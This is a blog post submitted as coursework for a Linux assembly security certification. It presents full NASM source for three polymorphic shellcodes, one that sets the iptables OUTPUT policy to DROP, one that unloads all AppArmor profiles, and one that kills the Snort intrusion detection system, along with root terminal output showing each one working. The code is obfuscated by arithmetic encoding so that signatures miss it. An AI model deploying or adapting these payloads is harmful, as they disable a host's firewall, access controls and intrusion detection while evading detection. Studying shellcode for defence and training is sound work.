Sunday, January 11, 2015

6. Polymorphic shellcode

The exam at Securitytube Linux Assembly Expert course consists of creating or analyzing shellcodes. This is the sixth assignment, where I have to create analyze three shellcode with ndisasm, gdb and libemu.

First polymorphic shellcode: iptables OUTPUT DROP policy

The solution on Github:
https://github.com/Z6543/My_SLAE/blob/master/06_polymorphism/1_iptables.nasm


The original shellcode: http://shell-storm.org/shellcode/files/shellcode-740.php
///sbin/iptables -P OUTPUT DROP(Policy of drop to OUTPUT chain)

The solution: 
global _start   

section .text
_start:
    ;xor eax,eax
    mov ebx, eax
    xor eax, ebx

    ;xor edx,edx
    mov edx, eax

    ;push eax
    mov dword [esp-4], eax
    sub esp, 4

    ;push dword 0x504f5244
    mov esi, 0x61606355
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4
 
    mov edi,esp
    push eax

    ;push dword 0x54555054
    mov esi, 0x65666165
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    ;push dword 0x554f502d
    mov esi, 0x6660613E
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    mov ecx,esp
    push eax
    ;push dword 0x73656c62
    mov esi, 0x84767D73
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4


    ;push dword 0x61747069
    mov esi, 0x7285817A
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    ;push dword 0x2f6e6962
    mov esi, 0x407F7A73
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    ;push dword 0x732f2f2f
    mov esi, 0x84404040
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    mov ebx,esp
    push eax
    push edi
    push ecx
    push ebx
    mov ecx,esp
    xor edx,edx
    mov al,0xb
    int 0x80
Check if it works: 
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# iptables -L OUTPUT
Chain OUTPUT (policy ACCEPT)
...
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# iptables -L OUTPUT
Chain OUTPUT (policy DROP)
...

Second polymorphic shellcode: apparmor teardown

The solution on Github:
https://github.com/Z6543/My_SLAE/blob/master/06_polymorphism/2_apparmor.nasm

The original shellcode:
http://shell-storm.org/shellcode/files/shellcode-765.php

The solution: 
global _start

section .text
_start:

  push byte +0xb
  pop eax
  ;xor edx,edx
  mov edx, ebx
  xor edx, ebx  

  push edx
  ;push dword 0x6e776f64
      mov esi, 0x7F888075
  sub esi, 0x11111111
      mov dword [esp-4],esi
      sub esp, 4

  ;push dword 0x72616574
                mov esi, 0x83727685
                sub esi, 0x11111111
                mov dword [esp-4],esi
                sub esp, 4

  mov ecx,esp
  push edx

  ;push dword 0x726f6d72
                mov esi, 0x83807E83
                sub esi, 0x11111111
                mov dword [esp-4],esi
                sub esp, 4

  ;push dword 0x61707061
                mov esi, 0x72818172
                sub esi, 0x11111111
                mov dword [esp-4],esi
                sub esp, 4

  ;push dword 0x2f642e74
                mov esi, 0x40753F85
                sub esi, 0x11111111
                mov dword [esp-4],esi
                sub esp, 4

  ;push dword 0x696e692f
                mov esi, 0x7A7F7A40
                sub esi, 0x11111111
                mov dword [esp-4],esi
                sub esp, 4

  ;push dword 0x6374652f
                mov esi, 0x74857640
                sub esi, 0x11111111
                mov dword [esp-4],esi
                sub esp, 4

  mov ebx,esp
  push edx
  push ecx
  push ebx
  mov ecx,esp
  int 0x80
Check to see if it works: 
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# /etc/init.d/apparmor status
apparmor module is loaded.
6 profiles are loaded.
6 profiles are in enforce mode.
   /sbin/dhclient
   /usr/lib/NetworkManager/nm-dhcp-client.action
   /usr/lib/connman/scripts/dhclient-script
   /usr/sbin/mysqld
   /usr/sbin/ntpd
   /usr/sbin/tcpdump
0 profiles are in complain mode.
2 processes have profiles defined.
2 processes are in enforce mode.
   /usr/sbin/mysqld (1588)
   /usr/sbin/ntpd (1310)
0 processes are in complain mode.
0 processes are unconfined but have a profile defined.

root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# ./all_compile.sh 2_apparmor
Usage ./all_compile.sh source_file  E.g. ./all_compile.sh test wwhere test.nasm is the source file
[+] Assembling with Nasm ...
[+] Linking ...
[+] Dumping shellcode ...
[+] Creating new shellcode.c ...
[+] Compiling shellcode.c ...
[+] Done! Run ./shellcode to execute!
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# ./shellcode
Shellcode Length:  146
 * Unloading AppArmor profiles
   ...done.
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# /etc/init.d/apparmor status
apparmor module is loaded.
0 profiles are loaded.
0 profiles are in enforce mode.
0 profiles are in complain mode.
0 processes have profiles defined.
0 processes are in enforce mode.
0 processes are in complain mode.
0 processes are unconfined but have a profile defined.

Third polymorphic shellcode: kill snort

The solution on Github:
https://github.com/Z6543/My_SLAE/blob/master/06_polymorphism/3_kill_snort.nasm
The original shellcode:
http://shell-storm.org/shellcode/files/shellcode-741.php

The solution: 
global _start

section .text
_start:

    xor eax,eax

    push eax
    push byte +0x74

    ;push dword 0x726f6e73
    mov esi, 0x83807F84
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    mov edi,esp
    push eax
    
    ;push dword 0x6c6c616c
    mov esi, 0x7D7D727D
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    ;push dword 0x6c696b2f
    mov esi, 0x7D7A7C40
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    ;push dword 0x6e69622f
    mov esi, 0x7F7A7340
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    ;push dword 0x7273752f
    mov esi, 0x83848640
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    mov ebx,esp
    push eax
    push edi
    push ebx
    mov ecx,esp
    xor edx,edx
    mov al,0xb
    int 0x80
Check if it works: 
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# ps -ewf | grep snort
root      9791  4145  0 14:58 pts/1    00:00:00 /bin/bash ./snort
root      9794  9452  0 14:58 pts/0    00:00:00 grep --color=auto snort
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# ./all_compile.sh  3_kill_snort && ./shellcode
Usage ./all_compile.sh source_file  E.g. ./all_compile.sh test wwhere test.nasm is the source file
[+] Assembling with Nasm ...
[+] Linking ...
[+] Dumping shellcode ...
[+] Creating new shellcode.c ...
[+] Compiling shellcode.c ...
[+] Done! Run ./shellcode to execute!
Shellcode Length:  111
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# ps -ewf | grep snort
root      9813  9452  0 14:58 pts/0    00:00:00 grep --color=auto snort
That's all!
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student-ID: SLAE - 607
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)